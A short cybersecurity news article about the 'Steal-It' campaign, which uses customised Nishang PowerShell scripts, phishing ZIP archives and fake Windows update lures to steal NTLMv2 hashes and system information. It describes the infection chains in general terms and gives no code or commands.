Tue. Oct 3rd, 2023
New Cyber Attack Campaign Stealing NTLMv2 Hashes

A recent cyber attack campaign named Steal-It by Zscaler ThreatLabz has been discovered, targeting compromised Windows systems primarily located in Australia, Poland, and Belgium. The attackers are using a PowerShell script associated with a legitimate red teaming tool to steal NTLMv2 hashes.

The campaign involves customized versions of Nishang’s Start-CaptureServer PowerShell script, which is used to execute system commands and exfiltrate the stolen NTLMv2 hashes via Mockbin APIs. Nishang is a framework and collection of PowerShell scripts and payloads commonly used in offensive security, penetration testing, and red teaming.

The attackers employ five different infection chains to target their victims. These include phishing emails containing ZIP archives, geofencing techniques, and specific lure tactics for different target groups. The infection chains are as follows:

1. NTLMv2 hash stealing infection chain: Utilizes a customized version of the Start-CaptureServer PowerShell script to harvest NTLMv2 hashes.
2. System info stealing infection chain: Targets Australian users by tricking them into downloading a CMD file that steals system information.
3. Fansly whoami infection chain: Tempts Polish users with explicit images of Ukrainian and Russian Fansly models, leading them to download a CMD file that exfiltrates the results of the whoami command.
4. Windows update infection chain: Targets Belgian users with fake Windows update scripts, running commands like tasklist and systeminfo.

Notably, the Computer Emergency Response Team of Ukraine (CERT-UA) previously highlighted the Windows update infection chain in May 2023 as part of an APT28 campaign against government institutions in Ukraine. This connection raises the possibility of the Steal-It campaign being the work of a Russian state-sponsored threat actor.

The security researchers analyzing the campaign comment on the threat actors’ technical expertise, as evidenced by their custom PowerShell scripts and strategic use of LNK files within ZIP archives. They also note the threat actors’ persistence in maintaining access through file movement and renaming in the Downloads and Startup folders.

The Steal-It campaign serves as a reminder of the ongoing threats in the cybersecurity landscape, emphasizing the importance of strong security measures and being vigilant against suspicious activities.